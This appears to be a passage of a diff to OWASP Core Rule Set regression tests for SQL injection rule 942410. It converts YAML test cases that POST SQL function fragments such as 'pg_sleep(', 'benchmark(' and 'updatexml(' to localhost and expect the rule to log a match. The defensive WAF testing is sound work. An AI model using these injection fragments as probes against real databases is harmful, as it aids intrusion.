942410-64 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=md5%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-65 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MID%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-66 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=minute+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-67 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=month%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-68 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "name_const(" - version: HTTP/1.0 - output: 
- log_contains: id "942410" - - test_title: 942410-69 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "now(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-70 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "nOW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-71 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ord(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-72 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "password?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-73 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "password/?(" - version: 
HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-74 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Password>$(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-75 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pg_sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-76 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pi(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-77 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "PI(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-78 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pow(" 
- version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-79 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "POW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-80 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "quarter. (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-81 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "rand(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-82 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Rand (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-83 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - 
data: "RAND(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-84 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "replace(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-85 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "REPLACE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-86 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "round (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-87 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "round(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-88 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - 
uri: "/post" - data: "rtrim(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-89 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RTRIM(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-90 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sin (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-91 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SIN(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-92 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-93 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: 
POST - port: 80 - uri: "/post" - data: "SLEEP (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-94 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=strcmp(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-95 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=substr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-96 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SUBSTR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-97 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=substring(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-98 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SUBSTRING(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-99 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sysdate(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-100 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "time (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-101 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=time%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-102 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=trim%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-103 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=Uncompress+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-104 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=unhex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-105 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=uNhEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-106 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=updatexml%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-107 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UpdateXML%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-108 - desc: "SQL Injection Attack" - stages: - - stage: - 
input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UPPER%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-109 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-110 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user%2F%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-111 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-112 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=values+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-113 - 
desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=VALUES%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-114 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=version%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-115 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=version%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-116 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xmltype%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-117 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=XMLType%28" - version: HTTP/1.0 - output: 
- log_contains: id "942410" - - test_title: 942410-118 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=year%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" + - test_id: 1 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ABS(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "benchmark(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 3 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENChmARk(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 4 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cast(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 5 + 
desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CAST(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 6 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "char(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 7 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "chaR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 8 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "chr(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 9 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CHR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 10 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COALESCE(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 11 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Compress (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 12 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "concat (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 13 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cOnCaT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 14 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "concat_ws(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 15 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "convert(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 16 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cOnVeRt(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 17 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COS(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 18 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COUNT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 19 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CURRENT_USER(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 20 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
